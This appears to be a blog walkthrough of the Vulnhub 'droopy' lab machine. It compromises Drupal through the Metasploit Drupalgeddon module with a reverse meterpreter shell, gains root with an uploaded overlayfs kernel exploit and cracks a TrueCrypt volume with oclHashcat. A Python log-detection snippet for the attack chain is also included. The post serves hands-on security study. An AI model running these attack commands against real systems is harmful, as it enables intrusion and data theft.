This is a quick post about how to hack this vulnerable virtual machine found on the Vulnhub website. Just to be clear, I am not a security professional; I am just learning and preparing for the OSCP exam. If you find any mistakes, please let me know.
First we do some network discovery with netdiscover:
We see that the host is at 192.168.1.159. Let's do an nmap scan:
nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Nmap shows that this machine hosts a website on an Apache web server, with Drupal running on it. I looked at the site and it requires a login and password. Fire up the Metasploit Framework and do a quick search for an exploit that fits our target. Because Drupal uses a MySQL database, a SQL injection is an obvious thing to try.
I chose the third one and crossed my fingers. Boom, we have a meterpreter connection.
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options
Module options (exploit/multi/http/drupal_drupageddon):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 192.168.1.159 yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.200 yes The listen address
LPORT 4444 yes The listen port
0 Drupal 7.0 - 7.31
msf exploit(drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 – Testing page
[*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Trying to parse enabled modules
[*] 192.168.1.159:80 – Enabling the PHP filter module
[*] 192.168.1.159:80 – Setting permissions for PHP filter module
[*] 192.168.1.159:80 – Getting tokens from create new article page
[*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200
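From the defender's side, the module output above is a recognisable request chain in the web server log: a login followed within seconds by enabling a module, changing permissions and posting the article form. As an added example (not part of the original post), the Python below walks constructed Apache combined-format log lines that mirror that chain and flags any client that completes it in order inside a short window; the two /admin paths are assumed Drupal 7 admin paths and the log lines are made up here, not taken from the box.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed Apache combined-log lines (not from the original post): one client replays the
# module's request chain within seconds, one ordinary editor acts hours apart.
SAMPLE_LOG = """\
192.168.1.200 - - [19/Apr/2016:11:06:21 +0200] "POST /user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.200 - - [19/Apr/2016:11:06:23 +0200] "POST /?q=admin/modules HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.200 - - [19/Apr/2016:11:06:24 +0200] "POST /admin/people/permissions HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.200 - - [19/Apr/2016:11:06:26 +0200] "POST /node/add/article HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2016:11:30:00 +0200] "POST /user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2016:14:10:00 +0200] "POST /node/add/article HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Ordered chain mirroring the module output: log in, enable a module (PHP filter), grant
# permissions, POST the article form (the preview). The two /admin paths are assumed Drupal 7 paths.
CHAIN = [("POST", "/user/login"), ("POST", "/admin/modules"),
         ("POST", "/admin/people/permissions"), ("POST", "/node/add/article")]

def parse(line):
    # Return (ip, timestamp, method, normalised path) or None for a line that does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"]
    if path.startswith("/?q="):          # Drupal's non-clean URL form (see robots.txt above)
        path = "/" + path[4:]
    return m["ip"], ts, m["method"], path.rstrip("/")

def find_drupageddon_chains(log_text, window_seconds=300):
    # Return {ip: (first_ts, last_ts)} for clients that complete CHAIN in order within the window.
    per_ip = defaultdict(list)
    for rec in filter(None, map(parse, log_text.splitlines())):
        per_ip[rec[0]].append(rec)
    hits = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r[1])
        idx, start = 0, None
        for _, ts, method, path in recs:
            if start is not None and (ts - start).total_seconds() > window_seconds:
                idx, start = 0, None         # chain went stale: start over from the login step
            want_method, want_path = CHAIN[idx]
            if method == want_method and path.startswith(want_path):
                start = ts if start is None else start
                idx += 1
                if idx == len(CHAIN):        # whole chain seen: record the time span
                    hits[ip] = (start, ts)
                    break
    return hits
```

Run over a real access log it will also fire on a legitimate admin who does all four steps quickly, so treat a hit as a lead to check against the users table for accounts that never existed before the flagged login.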
Good news. Let's look around and get some information out of the system. I used the sysinfo command; let's see what we have.
meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
So this is an Ubuntu machine with an old kernel. I'll try my luck and check whether this machine is vulnerable to the overlayfs vulnerability, what user permissions I have, and whether I can compile my exploit with gcc and run it.
First, transfer the exploit to the /tmp folder with meterpreter's upload command and try to execute it:
meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
gcc 37292.c -o exploit
chmod +x exploit
child threads done
creating shared library
sh: 0: can't access tty; job control turned off
Nice, we have root access to the system; let's find the flag. Usually the flag lives in the root directory, so let's see what we have.
Dave.tc? What? After googling a bit I found that the .tc extension could be a password-protected TrueCrypt file. Google says that TrueCrypt is discontinued and that password-protected volumes can be cracked with the proper program and a good dictionary. My first thought was oclHashcat, because I have an AMD card, and truecrack in Kali Linux supports Nvidia cards (only?). I didn't research whether it supports AMD too, because I am happy with oclHashcat. When I downloaded this vulnerable machine I saw two hints:
1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.
Okay, I have the rockyou wordlist, so let's check /var/mail:
Okay, let’s rock:
oclHashcat64.exe -a 0 -m 6211 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"
Exhausted. Nothing. Several hours later, still nothing. I tried applying rules (best64) and different dictionaries; nothing. The last sentence could also be a hint, so I did a dictionary combination attack (downloaded lyrics from The Jam, built a dictionary from them and combined it with rockyou). Still no luck. Would I fail at this point? It had been so easy until now. TRY HARDER! So I took a break, and when I sat in front of my computer again I had a clue. What if I was trying the wrong hashing algorithm? Some people on the hashcat forums mentioned that one should try the SHA512 algorithm instead of RIPEMD160. Okay, fire up oclHashcat again.
oclHashcat64.exe -a 0 -m 6221 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"
After a couple of minutes it finished. Cracked. Okay, let's install TrueCrypt and check what we got. When it prompted for the password I tried copy/paste and... wrong password. OMG, what is happening? Again Ctrl+C, Ctrl+V; still no luck. Could it be? What if I type the password instead of copy/pasting it? Yes, it was my fault. It shows the drive, mounted as drive H:
Check out this drive. Nothing interesting: some jpg files and a .secret folder. Hmm!
I opened it, and under the .top folder I captured the flag.
This was quite fun! Thank you!